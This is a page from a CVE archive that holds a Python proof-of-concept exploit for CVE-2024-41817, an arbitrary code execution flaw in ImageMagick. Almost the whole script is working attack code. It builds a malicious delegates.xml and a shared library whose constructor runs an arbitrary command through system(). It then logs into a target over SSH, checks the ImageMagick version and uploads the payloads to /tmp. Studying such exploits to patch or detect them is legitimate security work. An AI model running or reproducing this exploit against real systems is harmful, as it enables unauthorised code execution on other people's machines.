4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
"""
Exploit Title : CVE-2024-41817 POC ImageMagick <= 7.1.1-35 Arbitrary Code Execution
Date : 2025-03-18
Source : https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8
Vulnerable version : <= 7.1.1-35
Author : Daihyxsk
Github: https://github.com/Dxsk/CVE-2024-41817-poc/
Tested on : Ubuntu 22.04.5 LTS
With: ImageMagick 7.1.1-35
CVE: CVE-2024-41817 
Python version: 3.11
Python Requirements :
    - Paramiko (only for auto detection and auto exploit)
Gcc version: >= 9.4.0 
"""

from typing import Tuple
import re
import os
import time
import shutil
import argparse
from pathlib import Path


class ImageMagickExploit:
    """
    Generate exploit payloads for the ImageMagick vulnerability.
    
    Creates either a malicious delegates.xml file or a crafted library file
    with the specified command to be executed on the target system.
    """
    
    def __init__(self, cmd: str):
        self.command: str = cmd
        self.output_dir: Path = Path("out")

    def create_out_dir(self) -> None:
        """Create output directory if it doesn't exist."""
        if debug:
            print(f"[!] Creating {self.output_dir} directory")
        self.output_dir.mkdir(exist_ok=True)

    def delegate_generator(self) -> None:
        """Generate a delegates.xml file with the command specified."""
        content: str = f'<delegatemap><delegate xmlns="" decode="XML" command="{self.command}"/></delegatemap>'
        self.create_out_dir()
        
        delegate_path = self.output_dir / "delegates.xml"
        delegate_path.write_text(content)
        
        if delegate_path.exists():
            print(f"[!] Payload created in \"{delegate_path.absolute()}\"")
        else:
            print("[!] Error while creating payload")
            exit(1)
        
    def lib_generator(self) -> None:
        """Generate a libxcb.so file with the command specified."""
        content: str = f"""#include <stdio.h>
        #include <stdlib.h>
        #include <unistd.h>

        __attribute__((constructor)) void init(){{
            system(\"{self.command}\");
            exit(0);
        }}
        """.strip()
        content = '\n'.join(line.lstrip() for line in content.splitlines())
        self.create_out_dir()
        
        lib_path = self.output_dir / "libxcb.so"
        lib_path.write_text(content)
        
    def build_payload(self) -> bool:
        """Compile the shared library with gcc using -shared and -fPIC options."""
        
        if not shutil.which("gcc"):
            print("[!] gcc not found in the attacker machine")
            exit(1)
        
        source_file = self.output_dir / "libxcb.so"
        output_file = self.output_dir / "libxcb.so.1"
        
        print("[*] Compiling shared library with gcc...")
        compile_cmd = f"gcc -x c -shared -fPIC {source_file} -o {output_file}"
        
        try:
            if debug:
                print(f"[*] Executing command: {compile_cmd}")
            os.system(compile_cmd)
            output_file.chmod(0o755)
            
            if output_file.exists():
                print(f"[+] Shared library successfully compiled: {output_file}")
                output_file.rename(source_file)
                print(f"[+] Shared library ready to use: {source_file}")
            else:
                print("[!] Failed to compile the shared library")
                return False
            
            return True
        except Exception as e:
            print(f"[!] Compilation error: {str(e)}")
            return False


class SshConnection:
    """
    Manage SSH connection to the target system.
    
    Verifies if ImageMagick is vulnerable to the exploit
    and can automatically deploy and execute the exploit.
    """
    import paramiko
    
    def __init__(
        self, 
        host: str, 
        username: str, 
        password: str, 
        port: int,
    ):
        self.host: str = host
        self.port: int = port
        self.username: str = username
        self.password: str = password
        self.ssh = None

    def _paramiko_init(self) -> None:
        """Initialize the SSH client."""
        if debug:
            print("[*] Initializing paramiko")
            
        self.ssh = self.paramiko.SSHClient()
        self.ssh.set_missing_host_key_policy(self.paramiko.AutoAddPolicy())

    def _exec_command(self, command: str) -> Tuple[str, str, str]:
        """Execute a command on the remote system."""
        try:
            stdin, stdout, stderr = self.ssh.exec_command(command, get_pty=True)
            time.sleep(2)
            output = stdout.read().decode()
            error = stderr.read().decode()
        except Exception as e:
            print(f"[!] Unexpected error: {str(e)}")
            if self.ssh:
                self.ssh.close()
            exit(1)
        return (stdin, output, error)

    def _whereis_magick(self, whereis_output: str) -> str:
        """Parse the output of 'whereis magick' to find ImageMagick path."""
        if debug:
            print("[*] Searching for ImageMagick")
        
        if whereis_output and "magick:" in whereis_output:
            paths = whereis_output.split("magick:")[1].strip().split()
            if debug:
                print(f"[*] Output of 'whereis magick': {paths}")
            if len(paths) == 1:
                print(f"[+] Path of ImageMagick: {paths[0]}")
                return paths[0]
            elif len(paths) > 1:
                print("[!] Multiple paths for ImageMagick found, using the first one")
                print(f"[*] Paths: {', '.join(paths)}")
                return paths[0]
            else:
                print("[!] No valid path for ImageMagick was found")
                self.ssh.close()
                exit(1)
        
        else:
            print("[!] ImageMagick could not be located")
            self.ssh.close()
            exit(1)

    def _check_version(self, output: str) -> None:
        """
        Check if the ImageMagick version is vulnerable.
        
        Parses version string like:
        "Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org"
        """
        version_match = re.search(r'ImageMagick (\d+)\.(\d+)\.(\d+)-(\d+)', output)
        
        if not version_match:
            print("[!] Error while checking ImageMagick version")
            exit(1)
            
        major, minor, patch, build = map(int, version_match.groups())
        
        print(f"[+] ImageMagick version: {major}.{minor}.{patch}-{build}")
        
        if major <= 7 and minor <= 1 and patch <= 1 and build <= 35:
            print("[+] ImageMagick version is vulnerable")
        else:
            print("[!] ImageMagick version is not vulnerable")

    def check_image_magick_version(self) -> None:
        """Connect to target and check if ImageMagick is vulnerable."""
        magick: str = 'magick'
        
        if debug:
            print("[!] Checking ImageMagick version")
            print(f"[*] Connecting to {self.host}:{self.port} as {self.username}")
        
        self._paramiko_init()
        
        try:
            self.ssh.connect(
                self.host, 
                self.port, 
                self.username, 
                self.password,
                timeout=10,
                banner_timeout=10,
                auth_timeout=10
            )
            
        except self.paramiko.AuthenticationException:
            print("[!] Authentication failed. Please check your credentials.")
            exit(1)
        except self.paramiko.SSHException as e:
            print(f"[!] SSH error: {e}")
            exit(1)
        except Exception as e:
            print(f"[!] Connection error: {e}")
            exit(1)
        
        if debug:
            print("[*] Connected successfully, executing command")
        
        while True:
            stdin, output, error = self._exec_command(f"{magick} --version")

            if error:
                print("[!] Error while checking ImageMagick version")
                print(f"[!] Error details: {error}")
                self.ssh.close()
                exit(1)
            
            if not output:
                print("[!] No output received from command")
                self.ssh.close()
                exit(1)
            
            if "command not found" in output or "command not found" in error:
                print("[!] The 'magick' command was not found")
                print("[*] Attempting to locate ImageMagick with 'whereis'...")
                stdin, output, error = self._exec_command("whereis magick")
                magick = self._whereis_magick(output)
            else:
                self.ssh.close()
                self._check_version(output)
                break
        
    def send_payload(self) -> bool:
        """Send the generated payloads to the /tmp/ directory of the target machine."""
        self._paramiko_init()
        
        try:
            if debug:
                print("[*] Creating an SFTP connection")

            self.ssh.connect(
                self.host, 
                self.port, 
                self.username, 
                self.password,
                timeout=10,
                banner_timeout=10,
                auth_timeout=10
            )
            
            sftp = self.ssh.open_sftp()
            
            # Check files to send
            out_dir = Path("out")
            payload_files = [f for f in out_dir.iterdir() if f.is_file()]
            if debug:
                print(f"[*] Payload files: {payload_files}")
                
            if not payload_files:
                print("[!] No payload found in the ./out/ directory")
                return False
            
            # Send each file
            for file_path in payload_files:
                remote_path = f"/tmp/{file_path.name}"
                
                if debug:
                    print(f"[*] Sending {file_path} to {remote_path}")
                
                sftp.put(str(file_path), remote_path)
                
                # Verify file was successfully sent
                stdin, output, error = self._exec_command(f"ls -la {remote_path}")
                if debug:
                    print(f"[*] Output of 'ls -la {remote_path}': \n{output}\r")
                if file_path.name in output:
                    print(f"[+] Payload {file_path.name} successfully sent to /tmp/")
                else:
                    print(f"[!] Failed to send payload {file_path.name}")
            
            sftp.close()
            return True
            
        except Exception as e:
            print(f"[!] Error while sending payloads: {str(e)}")
            return False


class ArgParser:
    """
    Parse command line arguments for the ImageMagick exploit.
    
    This script exploits CVE-2024-41817 in ImageMagick versions <= 7.1.1-35
    allowing arbitrary code execution via malicious XML delegation.
    
    Usage examples:
    
    # Autodetect:
        python3 exploit.py -H $TARGET -p $PORT -u $USER -P $PASSWORD -d
    # Build payload:
        python3 exploit.py -c "id" -B
    # Full (detecte, build and push):
        python3 exploit.py -c "id" -H $TARGET -p $PORT -u $USER -P $PASSWORD -A
    """
    
    def __init__(self):
        self.parser = argparse.ArgumentParser(description="ImageMagick Exploit")
        self.parser.add_argument("-c", "--command", type=str, help="Command to execute")
        self.parser.add_argument("-H", "--host", type=str, help="Host")
        self.parser.add_argument("-p", "--port", type=int, help="Port (default port 22)")
        self.parser.add_argument("-u", "--username", type=str, help="Username")
        self.parser.add_argument("-P", "--password", type=str, help="Password")
        self.parser.add_argument("-d", "--detection", action="store_true", help="Auto-detect ImageMagick if vulnerable")
        self.parser.add_argument("-B", "--build", action="store_true", help="Only build the payload with the command specified")
        self.parser.add_argument("-A", "--auto", action="store_true", help="Check, Build and Push the payload to the target")
        self.parser.add_argument("-v", "--verbose", action="store_true", help="Verbose mode to display more information during execution")
        self.args = self.parser.parse_args()
    
    def get_args(self):
        return self.args


def check_port(args) -> int:
    """Return valid port or default to 22."""
    if args.port is None:
        if debug:
            print("[!] Default ssh port used (22)")
        return 22
    return args.port


def check_command(args) -> str:
    """Return valid command or default to 'id'."""
    if args.command is None:
        if debug:
            print("[*] No command specified, using 'id' as default")
        return "id"
    return args.command


def build(args) -> None:
    """Build the payload with the specified command."""
    print("[!] Building payload")
    command = check_command(args)
    exploit = ImageMagickExploit(command)
    exploit.delegate_generator()
    exploit.lib_generator()
    exploit.build_payload()


def detection(args) -> None:
    """Check if target is vulnerable to the exploit."""
    if debug:
        print("[*] Host, username and password:")
        print("[*]", args.host, args.username[:3] + '...', args.password[-3:] + '...')
        
    if not args.host or not args.username or not args.password:
        print("[!] Host, username and password are required for auto detection")
        exit(1)
            
    port = check_port(args)
    ssh = SshConnection(
        host=args.host, 
        port=port, 
        username=args.username, 
        password=args.password
    )
    ssh.check_image_magick_version()


def auto(args) -> None:
    """Run detection, build payload, and deploy to target."""
    print("[!] Auto mode")
    if debug:
        print("[!] Starting detection")
    detection(args)
    
    if debug:
        print("[!] Starting build")
    build(args)
    
    if debug:
        print("[!] Starting push")
    port = check_port(args)
    ssh = SshConnection(
        host=args.host, 
        port=port, 
        username=args.username, 
        password=args.password
    )
    if debug:
        print("[!] Sending payload")
    ssh.send_payload()


def main() -> None:
    global debug
    debug = False
    
    arg_parser = ArgParser()
    helper = arg_parser.__doc__
    args = arg_parser.get_args()

    if args.verbose:
        print("[Debug] enabled")
        debug = True
    
    if args.build:
        print("[!] Mode build only")
        build(args)
        
    elif args.detection:
        print("[!] Mode detection only")
        detection(args)
    
    elif args.auto:
        print("[!] Mode auto, detection, build and push the payload to the target")
        if not args.host or not args.username or not args.password:
            print("[!] Host, username and password are required for auto detection")
            exit(1)
        
        auto(args)
    else:
        print(helper)
    

if __name__ == "__main__":
    main()